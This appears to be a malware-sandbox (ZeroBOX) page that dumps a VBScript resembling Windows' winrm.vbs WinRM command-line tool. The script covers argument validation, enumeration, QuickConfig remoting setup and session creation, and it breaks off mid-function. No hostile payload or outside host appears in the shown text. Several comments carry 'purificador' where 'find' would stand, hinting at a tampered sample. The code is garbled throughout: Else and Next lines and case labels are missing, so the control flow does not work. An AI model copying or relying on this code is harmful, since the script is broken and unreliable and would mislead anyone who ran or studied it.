Static | ZeroBOX
No static analysis available.
Public Function ValidateArguments()
Dim unnamedCount
Dim unnamedCountExpected
Dim valid
Dim index
valid = True
m_op = LCase(Argument(NPARA_PSEUDO_OPERATION))
If (Not m_allowedOperations.Exists(m_op)) Then
ErrorHandler True, GetResource("L_UNKOPNM_Message") & "'" & m_op & "'"
End If
LoadAllowedParameters m_op
'Make sure there the right number of unnamed arguments based upon op
unnamedCount = m_commandLineParser.UnnamedCount - m_commandIndex
unnamedCountExpected = m_allowedOperations(m_op) + 2
'Remove @{} from count
If (ArgumentExists(NPARA_PSEUDO_AT)) Then
unnamedCount = unnamedCount - 1
End If
If (unnamedCount <> unnamedCountExpected) Then
valid = False
End If
'Make sure the unnamed parameters come first
If (m_commandLineParser.FirstSwitchIndex <= unnamedCountExpected) Then
If (m_commandLineParser.FirstSwitchIndex > 0) Then
valid = False
End If
End If
If (ArgumentExists(NPARA_PSEUDO_AT) Or ArgumentExists(NPARA_FILE)) Then
If (operation <> OP_INV And operation <> OP_CRE And operation <> OP_PUT) Then
ErrorHandler True, L_OpDoesntAcceptInput_ErrorMessage
End If
End If
'loop through all named parameters and make sure they are in the allowed list
For index = 0 To m_commandLineParser.NamedCount - 1
If Not m_knownParameterNames.Exists(LCase(m_commandLineParser.NamedKeyByIndex(index))) Then
valid = False
ErrorHandler False, GetResource("L_UNKOPT_ErrorMessage") & m_commandLineParser.NamedKeyByIndex(index)
Elseif Not m_allowedParameterNames.Exists(LCase(m_commandLineParser.NamedKeyByIndex(index))) Then
valid = False
ErrorHandler False, GetResource("L_INVOPT_ErrorMessage") & m_commandLineParser.NamedKeyByIndex(index)
End If
If Not valid Then
ErrorHandler True,L_UNKOPT_GenMessage & m_commandLineParser.NamedKeyByIndex(index)
End If
End Function
Private Sub Class_Initialize()
Set m_commandLineParser = New CommandLineParser
Set m_allowedOperations = CreateObject("Scripting.Dictionary")
Set m_allowedParameterNames = CreateObject("Scripting.Dictionary")
Set m_knownParameterNames = CreateObject("Scripting.Dictionary")
m_commandIndex = 0
End Sub
Public Function Operation()
Operation = m_op
End Function
Public Function ArgumentExists(argumentName)
Dim index
ArgumentExists = False
If LCase(argumentName) = NPARA_PSEUDO_COMMAND Then
ArgumentExists = m_commandLineParser.UnnamedExists(m_commandIndex)
ElseIf LCase(argumentName) = NPARA_PSEUDO_OPERATION Then
ArgumentExists = m_commandLineParser.UnnamedExists(m_commandIndex + 1)
ElseIf LCase(argumentName) = NPARA_PSEUDO_ACTION Then
If LCase(m_commandLineParser.UnnamedValue(m_commandIndex + 1)) = OP_INV Then
ArgumentExists = m_commandLineParser.UnnamedExists(m_commandIndex + 2)
End If
ElseIf LCase(argumentName) = NPARA_PSEUDO_RESOURCE Then
If LCase(m_commandLineParser.UnnamedValue(m_commandIndex + 1)) = OP_INV Then
ArgumentExists = m_commandLineParser.UnnamedExists(m_commandIndex + 3)
ArgumentExists = m_commandLineParser.UnnamedExists(m_commandIndex + 2)
End If
ElseIf argumentName = NPARA_PSEUDO_AT Then
For index = m_commandIndex To m_commandLineParser.UnnamedCount - 1
If Mid(m_commandLineParser.UnnamedValue(index),1,1) = NPARA_PSEUDO_AT Then
ArgumentExists = True
Exit For
End If
ArgumentExists = m_commandLineParser.NamedExists(argumentName)
End If
End Function
Public Function Argument(argumentName)
Dim index
If IsNumeric(argumentName) Then
Argument = m_commandLineParser.PositionName(argumentName + m_commandIndex)
ElseIf LCase(argumentName) = NPARA_PSEUDO_COMMAND Then
Argument = m_commandLineParser.UnnamedValue(m_commandIndex)
ElseIf LCase(argumentName) = NPARA_PSEUDO_OPERATION Then
Argument = m_commandLineParser.UnnamedValue(m_commandIndex + 1)
ElseIf LCase(argumentName) = NPARA_PSEUDO_ACTION Then
If LCase(m_commandLineParser.UnnamedValue(m_commandIndex + 1)) = OP_INV Then
Argument = m_commandLineParser.UnnamedValue(m_commandIndex + 2)
Argument = ""
End If
ElseIf LCase(argumentName) = NPARA_PSEUDO_RESOURCE Then
If LCase(m_commandLineParser.UnnamedValue(m_commandIndex + 1)) = OP_INV Then
Argument = m_commandLineParser.UnnamedValue(m_commandIndex + 3)
Argument = m_commandLineParser.UnnamedValue(m_commandIndex + 2)
End If
ElseIf argumentName = NPARA_PSEUDO_AT Then
For index = m_commandIndex To m_commandLineParser.UnnamedCount - 1
If Mid(m_commandLineParser.UnnamedValue(index),1,1) = NPARA_PSEUDO_AT Then
Argument = Mid(m_commandLineParser.UnnamedValue(index),2)
Exit For
Argument = ""
End If
Argument = m_commandLineParser.NamedValue(argumentName)
If argumentName = NPARA_FORMAT Then
If (Mid(Argument,1,1) = "#") Then
Argument = Mid(Argument,2)
End If
End If
End If
End Function
Public Function Count
Count = m_commandLineParser.Count - m_commandIndex
End Function
Public Function Parse(commandLineStr)
Dim rval
Dim index
rval = m_commandLineParser.Parse(commandLineStr)
If rval Then
rval = False
For index = 0 To m_commandLineParser.UnnamedCount - 1
If InStr(LCase(m_commandLineParser.UnnamedValue(index)),"winrm.vbs") > 0 Then
m_commandIndex = index
rval = True
Exit For
End If
If Not rval Then
ErrorHandler True, GetResource("L_ScriptNameNotFound_ErrorMessage")
End If
End If
Parse = rval
End Function
' Removes ?params part from URI
private function StripParams(uri)
dim qmpos
ASSERTBOOL Len(uri) <> 0, GetResource("L_URIZERO_Message")
qmpos = InStr(uri, "?")
if qmpos <> 0 then
StripParams = Left(uri, qmpos - 1)
StripParams = uri
end if
end function
' Enumerate helper
private function Enumerate(wsmanObj, session, cmdlineOptions, resLocator, formatOption)
dim filter
dim dialect
dim e
dim res
dim formattedText
dim flags
flags = 0
if cmdlineOptions.ArgumentExists(NPARA_FILTER) then
filter = cmdlineOptions.Argument(NPARA_FILTER)
end if
if cmdlineOptions.ArgumentExists(NPARA_DIALECT) then
dialect = cmdlineOptions.Argument(NPARA_DIALECT)
end if
If LCase(dialect) = "selector" Then
dialect = ""
End If
If LCase(dialect) = "" Then
dim dict
set dict = ProcessParameterHash(filter)
If dict Is Nothing Then
Exit Function
End If
Dim name
Dim value
filter = "<wsman:SelectorSet xmlns:wsman=''>"
For Each name In dict
value = dict(name)
filter = filter & "<wsman:Selector Name='" & Escape(name) & "'>" & Escape(value) & "</wsman:Selector>"
filter = filter & "</wsman:SelectorSet>"
End If
If LCase(dialect) = "wql" Then
dialect = ""
End If
If LCase(dialect) = "association" Then
dialect = ""
End If
If LCase(dialect) = LCase("") Then
If not cmdlineOptions.ArgumentExists(NPARA_FILTER) Then
ASSERTBOOL false, "-" & NPARA_FILTER & " parameter is required for the given dialect"
End If
If (cmdlineOptions.ArgumentExists(NPARA_ASSOCINST)) Then
flags = flags OR wsmanObj.EnumerationFlagAssociationInstance
flags = flags OR wsmanObj.EnumerationFlagAssociatedInstance
End if
End If
If ( (LCase(dialect) <> LCase("")) and cmdlineOptions.ArgumentExists(NPARA_ASSOCINST) ) Then
ASSERTBOOL false, "-" & NPARA_ASSOCINST & " is not a valid option for the given dialect"
End If
if cmdlineOptions.ArgumentExists(NPARA_RETURN_TYPE) then
select case LCase(cmdlineOptions.Argument(NPARA_RETURN_TYPE))
' default
flags = flags OR wsmanObj.EnumerationFlagReturnEPR
flags = flags OR wsmanObj.EnumerationFlagReturnObjectAndEPR
case else
ASSERTBOOL false, "-" & NPARA_RETURN_TYPE & ":" & cmdlineOptions.Argument(NPARA_RETURN_TYPE) & " is not a valid option"
end select
end if
if (cmdlineOptions.ArgumentExists(NPARA_SHALLOW)) then
flags = flags OR wsmanObj.EnumerationFlagHierarchyShallow
elseif (cmdlineOptions.ArgumentExists(NPARA_BASE_PROPS_ONLY)) then
flags = flags OR wsmanObj.EnumerationFlagHierarchyDeepBasePropsOnly
flags = flags OR wsmanObj.EnumerationFlagHierarchyDeep
end if
on error resume next
set e = session.Enumerate(resLocator, filter, dialect, flags)
if Err.Number = T_O then
set e = session.Enumerate(resLocator, filter, dialect, flags)
if Err.Number = T_O then
set e = session.Enumerate(resLocator, filter, dialect, flags)
end if
end if
ASSERTERR session, formatOption
on error goto 0
if cmdlineOptions.ArgumentExists(NPARA_TIMEOUT) then
e.Timeout = cmdlineOptions.Argument(NPARA_TIMEOUT)
end if
if(LCase(formatOption) <> VAL_FORMAT_TEXT) then
wscript.echo "<wsman:Results xmlns:wsman="""">"
end if
do while Not e.AtEndOfStream
on error resume next
res = e.ReadItem()
if Err.Number = T_O then
res = e.ReadItem()
if Err.Number = T_O then
res = e.ReadItem()
end if
end if
if Err.Number <> 0 then
stdErr.WriteLine e.Error
wscript.echo "</wsman:Results>"
end if
ASSERTERR e, formatOption
on error goto 0
'reformat if requested
on error resume next
if not Reformat(res,formattedText,formatOption) then
exit do
end if
wscript.echo formattedText
if(LCase(formatOption) <> VAL_FORMAT_TEXT) then
wscript.echo "</wsman:Results>"
end if
set e = Nothing
Enumerate = ""
end function
private function GetSuffix(resUri)
ASSERTBOOL Len(resUri) <> 0, GetResource("L_URIZERO_Message")
GetSuffix = "_INPUT"
end function
' QuickConfig helper
Private Function QuickConfig(session, cmdlineOptions)
QuickConfigRemoting session, cmdlineOptions, true
If Err.Number <> 0 Then
Exit Function
End If
QuickConfigRemoting session, cmdlineOptions, false
End function
Private Function QuickConfigRemoting(session, cmdlineOptions, serviceOnly)
Dim analysisInputXml
Dim analysisOutputXml
Dim analysisOutput
Dim transport
Dim action
If (serviceOnly = false) Then
If (Not cmdlineOptions.ArgumentExists(NPARA_TRANSPORT)) Then
transport = "http"
transport = cmdlineOptions.Argument(NPARA_TRANSPORT)
End If
End If
If (serviceOnly = true) Then
analysisInputXml = "<AnalyzeService_INPUT xmlns=""""></AnalyzeService_INPUT>"
action = "AnalyzeService"
ElseIf (cmdlineOptions.ArgumentExists(NPARA_FORCE)) Then
analysisInputXml = "<Analyze_INPUT xmlns=""""><Transport>" & transport & "</Transport><Force/></Analyze_INPUT>"
action = "Analyze"
analysisInputXml = "<Analyze_INPUT xmlns=""""><Transport>" & transport & "</Transport></Analyze_INPUT>"
action = "Analyze"
End If
On Error Resume Next
analysisOutputXml = sessionObj.Invoke(action, "winrm/config/service", analysisInputXml)
If Err.Number <> 0 Then
Exit Function
End If
'wscript.echo analysisOutputXml
On Error Resume Next
Set analysisOutput = CreateObject("MSXML2.DOMDocument.6.0")
If Err.number <> 0 Then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_MSXML6MISSING_Message")
Exit Function
End If
If (analysisOutput.parseError.errorCode <> 0) Then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_XMLERROR_Message") & paramXmlFile.parseError.reason
Exit Function
End If
Dim xpathEnabled
Dim xpathText
Dim xpathUpdate
If (serviceOnly = true) Then
xpathEnabled = "/s:AnalyzeService_OUTPUT/s:RemotingEnabled"
xpathText = "/s:AnalyzeService_OUTPUT/s:Results"
xpathUpdate = "/s:AnalyzeService_OUTPUT/s:EnableService_INPUT"
xpathEnabled = "/s:Analyze_OUTPUT/s:RemotingEnabled"
xpathText = "/s:Analyze_OUTPUT/s:Results"
xpathUpdate = "/s:Analyze_OUTPUT/s:EnableRemoting_INPUT"
End If
Dim enabled
Dim displayText
Dim updateInputXml
Dim source
enabled = GetElementByXpath(analysisOutput, xpathEnabled)
source = GetElementAttributeByXpath(analysisOutput, xpathEnabled, "Source")
If (enabled = "true") Then
If (serviceOnly = true) Then
stdOut.WriteLine GetResource("L_QuickConfigNoServiceChangesNeeded_Message2")
stdOut.WriteLine GetResource("L_QuickConfigNoChangesNeeded_Message")
End If
Exit Function
End If
If (enabled <> "false") Then
stdErr.WriteLine GetResource("L_QuickConfig_InvalidBool_0_ErrorMessage")
Exit Function
End If
displayText = GetElementByXpath(analysisOutput, xpathText)
updateInputXml = GetElementByXpath(analysisOutput, xpathUpdate)
if (source = "GPO") Then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_QuickConfig_RemotingDisabledbyGP_00_ErrorMessage")
stdErr.WriteLine displayText
Exit Function
End If
'wscript.echo updateInputXml
If (updateInputXml = "" OR displayText = "") Then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_QuickConfig_MissingUpdateXml_0_ErrorMessage")
Exit Function
End If
If (serviceOnly = true) Then
stdOut.writeline GetResource("L_QuickConfig_ServiceUpdatesNeeded_0_Message")
stdOut.writeline GetResource("L_QuickConfig_UpdatesNeeded_0_Message")
End If
stdOut.writeline GetResource("L_QuickConfig_UpdatesNeeded_1_Message")
stdOut.writeline ""
stdOut.writeline displayText
stdOut.writeline ""
If (Not cmdlineOptions.ArgumentExists(NPARA_QUIET) And Not cmdlineOptions.ArgumentExists(NPARA_FORCE)) Then
stdOut.write GetResource("L_QuickConfig_Prompt_0_Message")
dim answer
answer = LCase(stdIn.ReadLine)
If answer <> "y" And answer <> "yes" Then
Exit Function
End If
stdOut.writeline ""
End If
Dim updateOutputXml
If (serviceOnly = true) Then
action = "EnableService"
action = "EnableRemoting"
End If
On Error Resume Next
updateOutputXml = sessionObj.Invoke(action, "winrm/config/service", updateInputXml)
If Err.Number <> 0 Then
Exit Function
End If
'wscript.echo updateOutputXml
Dim updateOutput
On Error Resume Next
Set updateOutput = CreateObject("MSXML2.DOMDocument.6.0")
If Err.number <> 0 Then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_MSXML6MISSING_Message")
Exit Function
End If
If (updateOutput.parseError.errorCode <> 0) Then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_XMLERROR_Message") & paramXmlFile.parseError.reason
Exit Function
End If
Dim xpathStatus
Dim xpathResult
If (serviceOnly = true) Then
xpathStatus = "/s:EnableService_OUTPUT/s:Status"
xpathResult = "/s:EnableService_OUTPUT/s:Results"
xpathStatus = "/s:EnableRemoting_OUTPUT/s:Status"
xpathResult = "/s:EnableRemoting_OUTPUT/s:Results"
End If
Dim status
Dim resultText
status = GetElementByXpath(updateOutput, xpathStatus)
resultText = GetElementByXpath(updateOutput, xpathResult)
If (status = "succeeded") Then
If (serviceOnly = true) Then
stdOut.WriteLine GetResource("L_QuickConfigUpdatedService_Message")
stdOut.WriteLine GetResource("L_QuickConfigUpdated_Message")
End If
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_QuickConfigUpdateFailed_ErrorMessage")
End If
If (resultText <> "") Then
stdOut.WriteLine ""
stdOut.WriteLine resultText
End If
End Function
' Helper to run xpath over msxml obj and purificador single element
Private Function GetElementByXpath(msxmlObj, xpath)
GetElementByXpath = ""
msxmlObj.setProperty "SelectionLanguage", "XPath"
msxmlObj.setproperty "SelectionNamespaces", "xmlns:s="""""
Dim elementList
Dim currentElement
Set currentElement = msxmlObj.selectSingleNode(xpath)
If Not currentElement is Nothing Then
If currentElement.hasChildNodes() Then
If currentElement.childNodes.length = 1 Then
dim aNode
Set aNode = currentElement.childNodes.nextNode()
If aNode.nodeType = NODE_TEXT Then
GetElementByXpath = aNode.text
Exit Function
End If
End If
End If
GetElementByXpath = currentElement.xml
End If
Exit Function
Set elementList = msxmlObj.selectNodes(xpath)
If elementList.length = 1 Then
Set currentElement = elementList.nextNode()
If currentElement.nodeType = NODE_TEXT Then
GetElementByXpath = currentElement.text
GetElementByXpath = currentElement.xml
End If
End If
End Function
' Helper to run xpath over msxml obj and purificador single element
Private Function GetElementAttributeByXpath(msxmlObj, xpath, attributeName)
GetElementAttributeByXpath = ""
msxmlObj.setProperty "SelectionLanguage", "XPath"
msxmlObj.setproperty "SelectionNamespaces", "xmlns:s="""""
Dim currentElement
Set currentElement = msxmlObj.selectSingleNode(xpath)
GetElementAttributeByXpath = currentElement.getAttribute("Source")
End Function
' Helper to run xpath over msxml obj and purificador single element
Private Function GetElementXml(msxmlObj, currentElement)
GetElementXml = ""
msxmlObj.setProperty "SelectionLanguage", "XPath"
msxmlObj.setproperty "SelectionNamespaces", "xmlns:s="""""
Dim elementList
GetElementByXpath = currentElement.xml
End Function
' Returns XML ns depending on the type of URI
private function GetXmlNs(resUri)
dim resUriLCase
dim s1
dim s2
ASSERTBOOL Len(resUri) <> 0, GetResource("L_URIZERO_Message")
resUriLCase = LCase(resUri)
if InStr(resUriLCase, URI_IPMI) <> 0 then
GetXmlNs = StripParams(resUri)
elseif InStr(resUriLCase, URI_WMI) <> 0 then
GetXmlNs = StripParams(resUri)
'//GetXmlNs = StripParams(resUri) & ".xsd"
'//This was reported by Intel as an interop issue. So now we are not appending a .xsd in the end.
GetXmlNs = StripParams(resUri)
end if
GetXmlNs = "xmlns:p=""" & GetXmlNs & """"
end function
' Verify if target is in IPv6 format
private function IsIPv6(target)
dim regexpObj
Set regexpObj = New RegExp
regexpObj.Pattern = PTRN_IPV6_S
regexpObj.IgnoreCase = TRUE
dim matches
set matches = regExpObj.Execute(target)
if matches.Count <> 0 then
IsIPv6 = true
IsIPv6 = false
end if
end function
' Extracts XML root node nm. from URI
private function GetRootNodeName(opr, resUri, actUri)
dim uriTmp
dim sfx
dim s
dim regexpObj
Set regexpObj = New RegExp
ASSERTBOOL Len(opr) <> 0, "'opr' parameter is 0 length or null"
sfx = ""
select case opr
case OP_PUT
uriTmp = resUri
case OP_CRE
uriTmp = resUri
case OP_INV
uriTmp = actUri
sfx = GetSuffix(resUri)
case else
GetRootNodeName = ""
exit function
end select
ASSERTBOOL Len(uriTmp) <> 0, GetResource("L_URIZERO_Message")
uriTmp = StripParams(uriTmp)
regexpObj.Pattern = PTRN_URI_LAST
regexpObj.IgnoreCase = TRUE
dim matches
set matches = regexpObj.Execute(uriTmp)
ASSERTBOOL matches.Count = 1, GetResource("L_NOLASTTOK_Message")
uriTmp = matches(0)
ASSERTBOOL Len(uriTmp) <> 0, GetResource("L_URIZEROTOK_Message")
GetRootNodeName = uriTmp & sfx
end function
private function ProcessParameterHash(hashString)
on error resume next
dim matches
dim m
dim regexpObj
Set regexpObj = New RegExp
regexpObj.Global = True
regexpObj.IgnoreCase = True
dim resultDictionary
set resultDictionary = CreateObject("Scripting.Dictionary")
If Len(hashString) > 0 then
If Len(hashString) > 2 Then
If Mid(hashString,1,1) <> "{" Or Mid(hashString,Len(hashString),1) <> "}" Then
stdErr.WriteLine GetResource("L_HashSyntax_ErrorMessage")
set ProcessParameterHash = Nothing
Exit Function
End If
regexpObj.Pattern = PTRN_HASH_VALIDATE
regexpObj.ignoreCase = true
set matches = regexpObj.Execute(hashString)
if matches.Count <> 1 then
stdErr.WriteLine GetResource("L_HashSyntax_ErrorMessage")
set ProcessParameterHash = Nothing
Exit Function
end if
'following check ensures that if we have unmatched substrings
'we report a syntax error. the way we determine is first to
'calculate the expected string length by going through all
'the matches and then comparing with input string length
dim expectedLength
regexpObj.Pattern = PTRN_HASH_TOK
regexpObj.ignoreCase = true
set matches = regexpObj.Execute(hashString)
expectedLength = matches.Count-1
for each m in matches
expectedLength = expectedLength + m.Length
'account for starting and closing {}
expectedLength = expectedLength + 2
if (expectedLength <> Len(hashString)) then
stdErr.WriteLine GetResource("L_HashSyntax_ErrorMessage")
set ProcessParameterHash = Nothing
Exit Function
end if
regexpObj.Pattern = PTRN_HASH_TOK
regexpObj.ignoreCase = true
set matches = regexpObj.Execute(hashString)
if matches.Count > 0 then
for each m in matches
if resultDictionary.Exists(m.Submatches(0)) then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_PUT_PARAM_NOARRAY_Message") & m.Submatches(0)
set ProcessParameterHash = Nothing
Exit Function
end if
if LCase(m.Submatches(1)) = "$null" then
resultDictionary.Add m.Submatches(0),null
resultDictionary.Add m.Submatches(0),m.Submatches(2)
end if
end if
ElseIf hashString <> "{}" Then
stdErr.WriteLine GetResource("L_HashSyntax_ErrorMessage")
set ProcessParameterHash = Nothing
Exit Function
End If
stdErr.WriteLine GetResource("L_HashSyntax_ErrorMessage")
set ProcessParameterHash = Nothing
Exit Function
End If
set ProcessParameterHash = resultDictionary
end function
private function CreateAndInitializeResourceLocator(wsman,resourceUri,cmdlineOptions)
on error resume next
Dim key
dim resourceLocator
dim paramMap
Dim optionsValue
' create the resource locator object
Set resourceLocator = Wsman.CreateResourceLocator(resourceUri)
if Err.number <> 0 then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_RESOURCELOCATOR_Message")
set CreateAndInitializeResourceLocator = Nothing
exit function
end if
' set the options on the resource locator
optionsValue = cmdlineOptions.Argument("options")
If Len(optionsValue) Then
set paramMap = ProcessParameterHash(optionsValue)
if paramMap Is Nothing then
set CreateAndInitializeResourceLocator = Nothing
'todo exit function
end if
for each key in paramMap
if IsNull(paramMap(key)) then
resourceLocator.AddOption key, null
resourceLocator.AddOption key,paramMap(key)
end if
End If
' set the fragment path and fragment dialect on the resource locator
if(cmdlineOptions.ArgumentExists(NPARA_FRAGMENT)) then
resourceLocator.FragmentPath = cmdlineOptions.Argument(NPARA_FRAGMENT)
end if
if(cmdlineOptions.ArgumentExists(NPARA_DIALECT)) then
resourceLocator.FragmentDialect = cmdlineOptions.Argument(NPARA_DIALECT)
end if
set CreateAndInitializeResourceLocator = resourceLocator
end function
' Reads input XML from the stdin or builds XML from @{...}
private function ProcessInput(wsman, operation, root, cmdlineOptions, resourceLocator,sessionObj,inputStr,formatOption)
on error resume next
dim parameterDic,key
dim putStr
dim elementList
dim currentElement
dim paramXmlFile
dim tmpNode
dim parameterString
dim parameterCount
dim xmlns
'make sure it's a relevent operation
select case operation
case OP_PUT
case OP_CRE
case OP_INV
case else
inputStr = ""
ProcessInput = true
exit function
end select
xmlns = GetXmlNs(resourceLocator.ResourceURI)
'process the parameters into a Map
parameterString = cmdlineOptions.Argument(NPARA_PSEUDO_AT)
parameterCount = 0
If Len(parameterString) Then
set parameterDic = ProcessParameterHash(parameterString)
'if parameter processing failed, exit
if parameterDic Is Nothing then
set ProcessInput = false
exit function
end if
parameterCount = parameterDic.Count
End If
'if there were no parameters, get from file
if parameterCount = 0 then
if cmdlineOptions.ArgumentExists(NPARA_FILE) then
inputStr = ReadFile(cmdlineOptions.Argument(NPARA_FILE))
ProcessInput = true
exit function
end if
end if
if operation = OP_CRE Or operation = OP_INV then
dim nilns
nilns = ""
dim parameters
parameters = ""
if parameterCount > 0 then
for each key in parameterDic
parameters = parameters & "<p:" & key
if IsNull(parameterDic(key)) then
parameters = parameters & " " & ATTR_NIL
nilns = " " & NS_XSI
end if
parameters = parameters & ">" & Escape(parameterDic(key)) & _
"</p:" & key & ">"
end if
putStr = "<p:" & root & " " & xmlns & nilns & ">" & _
parameters & "</p:" & root & ">"
elseif operation = OP_PUT then
if parameterCount = 0 then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_PUT_PARAM_NOINPUT_Message")
inputStr = ""
ProcessInput = false
exit function
end if
'get the original resource xml
on error resume next
putStr = sessionObj.Get(resourceLocator)
if Err.Number <> 0 then
ASSERTERR sessionObj, formatOption
inputStr = ""
ProcessInput = false
exit function
end if
'create an MSXML DomDocument object to work with the resource xml
on error resume next
Set paramXmlFile = CreateObject("MSXML2.DOMDocument.6.0")
if Err.number <> 0 then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_MSXML6MISSING_Message")
inputStr = ""
ProcessInput = false
exit function
end if
paramXmlFile.async = false
'load the domdocument with the resource xml
if (paramXmlFile.parseError.errorCode <> 0) then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_XMLERROR_Message") & paramXmlFile.parseError.reason
inputStr = ""
ProcessInput = false
exit function
end if
paramXmlFile.setProperty "SelectionLanguage", "XPath"
'loop through the command-line name/value pairs
for each key in parameterDic
'purificador the elements matching the key
Dim xpathString
xpathString = "/*/*[local-name()=""" & key & """]"
if LCase(key) = "location" then
'Ignore cim:Location
xpathString = "/*/*[local-name()=""" & key & """ and namespace-uri() != """ & NS_CIMBASE & """]"
end if
Set elementList = paramXmlFile.selectNodes(xpathString)
'make sure there is 1 - error on 0 or > 1
if elementList.length = 0 then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_PUT_PARAM_NOMATCH_Message") & key
inputStr = ""
ProcessInput = false
Exit Function
elseif elementList.length > 1 then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_PUT_PARAM_MULTIMATCH_Message") & key
inputStr = ""
ProcessInput = false
Exit Function
'get the node from the list
Set currentElement = elementList.nextNode()
'make sure the node does not have anything other than 1 or less text children
if currentElement.hasChildNodes() then
if currentElement.childNodes.length > 1 then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_PUT_PARAM_NOTATTR_Message") & key
inputStr = ""
ProcessInput = false
Exit Function
dim aNode
Set aNode = currentElement.childNodes.nextNode()
if aNode.nodeType <> NODE_TEXT then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_PUT_PARAM_NOTATTR_Message") & key
inputStr = ""
ProcessInput = false
Exit Function
end if
end if
end if
if IsNull(parameterDic(key)) then
Set tmpNode = paramXmlFile.createNode(NODE_ATTRIBUTE,ATTR_NIL_NAME,NS_XSI_URI)
tmpNode.text = "true"
currentElement.setAttributeNode tmpNode
currentElement.text = ""
'delete nil attribute if present
currentElement.text = parameterDic(key)
end if
end If
putStr = paramXmlFile.xml
end if
inputStr = putStr
ProcessInput = true
end function
private function ReadStdIn()
while Not stdIn.AtEndOfStream
ReadStdIn = ReadStdIn & stdIn.ReadAll
end function
' Escapes non XML chars
private function Escape(str)
dim i
for i = 1 to Len(str)
select case Mid(str, i, 1)
case "&"
Escape = Escape & "&amp;"
case "<"
Escape = Escape & "&lt;"
case ">"
Escape = Escape & "&gt;"
case """"
Escape = Escape & "&quot;"
case "'"
Escape = Escape & "&apos;"
case else
Escape = Escape & Mid(str, i, 1)
end select
end function
' Checks if this script is running under cscript.exe
private function IsCScriptEnv()
if InStrRev(LCase(WScript.FullName), "cscript.exe", -1) <> 0 then
IsCScriptEnv = True
IsCScriptEnv = False
end if
end function
private function CreateSession(wsman, conStr, optDic, formatOption)
dim sessionFlags
dim conOpt
dim session
dim authVal
dim encodingVal
dim encryptVal
dim pw
dim tout
' proxy information
dim proxyAccessType
dim proxyAccessTypeVal
dim proxyAuthenticationMechanism
dim proxyAuthenticationMechanismVal
dim proxyUsername
dim proxyPassword
sessionFlags = 0
proxyAccessType = 0
proxyAccessTypeVal = 0
proxyAuthenticationMechanism = 0
proxyAuthenticationMechanismVal = 0
proxyUsername = ""
proxyPassword = ""
set conOpt = Nothing
if optDic.ArgumentExists(NPARA_ENCODING) then
ASSERTBOOL optDic.ArgumentExists(NPARA_REMOTE), "The '-encoding' option is only valid when used with the '-remote' option"
encodingVal = optDic.Argument(NPARA_ENCODING)
if LCase(encodingVal) = "utf-16" then
sessionFlags = sessionFlags OR wsman.SessionFlagUTF16
elseif LCase(encodingVal) = "utf-8" then
sessionFlags = sessionFlags OR wsman.SessionFlagUTF8
' Invalid!
ASSERTBOOL false, "The specified encoding flag is invalid."
end if
end if
if optDic.ArgumentExists(NPARA_UNENCRYPTED) then
ASSERTBOOL optDic.ArgumentExists(NPARA_REMOTE), "The '-" & NPARA_UNENCRYPTED & "' option is only valid when used with the '-remote' option"
'C API will ensure that unencrypted is only used w/ http
sessionFlags = sessionFlags OR wsman.SessionFlagNoEncryption
end if
if optDic.ArgumentExists(NPARA_USESSL) then
ASSERTBOOL optDic.ArgumentExists(NPARA_REMOTE), "The '-" & NPARA_USESSL & "' option is only valid when used with the '-remote' option"
sessionFlags = sessionFlags OR wsman.SessionFlagUseSsl
end if
if optDic.ArgumentExists(NPARA_AUTH) then
authVal = optDic.Argument(NPARA_AUTH)
select case LCase(authVal)
sessionFlags = sessionFlags OR wsman.SessionFlagUseNoAuthentication
ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:none'"
ASSERTBOOL not optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option is not valid for '-auth:none'"
ASSERTBOOL not optDic.ArgumentExists(NPARA_PASSWORD), "The '-" & NPARA_PASSWORD & "' option is only valid for '-auth:none'"
'Use -username and -password.
ASSERTBOOL optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:basic'"
ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:basic'"
sessionFlags = sessionFlags OR wsman.SessionFlagCredUsernamePassword OR wsman.SessionFlagUseBasic
'Use -username and -password.
ASSERTBOOL optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:digest'"
ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:digest'"
sessionFlags = sessionFlags OR wsman.SessionFlagCredUsernamePassword OR wsman.SessionFlagUseDigest
'-username and -password are optional.
ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:kerberos'"
sessionFlags = sessionFlags OR wsman.SessionFlagUseKerberos
'-username and -password are optional.
ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:negotiate'"
sessionFlags = sessionFlags OR wsman.SessionFlagUseNegotiate
'-certificate is mandatory.
ASSERTBOOL optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option must be specified for '-auth:certificate'"
'-username or -password must not be used
ASSERTBOOL not optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option is not valid for '-auth:certificate'"
ASSERTBOOL not optDic.ArgumentExists(NPARA_PASSWORD), "The '-" & NPARA_PASSWORD & "' option is not valid for '-auth:certificate'"
sessionFlags = sessionFlags OR wsman.SessionFlagUseClientCertificate
'Use -username and -password.
